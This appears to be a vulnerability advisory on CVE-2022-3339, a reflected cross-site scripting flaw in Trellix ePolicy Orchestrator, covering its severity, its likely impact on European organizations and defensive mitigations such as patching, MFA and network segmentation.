CVE-2022-3339 is a reflected Cross-Site Scripting (XSS) vulnerability identified in Trellix ePolicy Orchestrator (ePO), a centralized security management platform widely used for managing endpoint security products. The vulnerability exists in versions prior to 5.10 Update 14 and allows a remote, unauthenticated attacker to craft a malicious URL that, when clicked by an authenticated ePO administrator, can execute arbitrary scripts within the administrator's browser context. This improper neutralization of input during web page generation (CWE-79) enables the attacker to hijack the administrator's session, potentially gaining limited access to sensitive information and the ability to alter some data within the ePO system. The attack requires user interaction (clicking the malicious link) but no prior authentication or elevated privileges. The CVSS v3.1 base score is 5.4 (medium severity), reflecting the network attack vector, low attack complexity, no privileges required, but user interaction needed, and limited impact on confidentiality and integrity without affecting availability. Although no known exploits are reported in the wild, the vulnerability poses a risk to organizations relying on Trellix ePO for endpoint security management, as compromise of an administrator session could lead to unauthorized changes or data exposure within the security infrastructure.

For European organizations, this vulnerability could undermine the integrity and confidentiality of endpoint security management, potentially allowing attackers to manipulate security policies or access sensitive security data. Given that ePO is often used to manage large fleets of endpoints, unauthorized access to the management console could facilitate further attacks or weaken overall security posture. The impact is particularly significant in sectors with stringent regulatory requirements for data protection and cybersecurity, such as finance, healthcare, and critical infrastructure. Although the vulnerability does not allow full system takeover or availability disruption, the ability to alter some information and access sensitive data can lead to compliance violations, data breaches, and erosion of trust in security controls. The requirement for user interaction (clicking a crafted link) means that social engineering or phishing campaigns could be used to exploit this vulnerability, increasing the risk in environments where administrators may be targeted.

European organizations should prioritize upgrading Trellix ePO to version 5.10 Update 14 or later, where this vulnerability is addressed. In addition to patching, organizations should implement strict email and web filtering to reduce the risk of phishing attempts delivering malicious links to administrators. Multi-factor authentication (MFA) for ePO administrator accounts should be enforced to limit the impact of session hijacking. Administrators should be trained to recognize and avoid clicking suspicious links, especially those received via email or messaging platforms. Network segmentation can be used to restrict access to the ePO management interface to trusted networks and devices only. Monitoring and logging of ePO administrative activities should be enhanced to detect anomalous behavior indicative of exploitation attempts. Finally, organizations should review and minimize the number of users with administrative privileges to reduce the attack surface.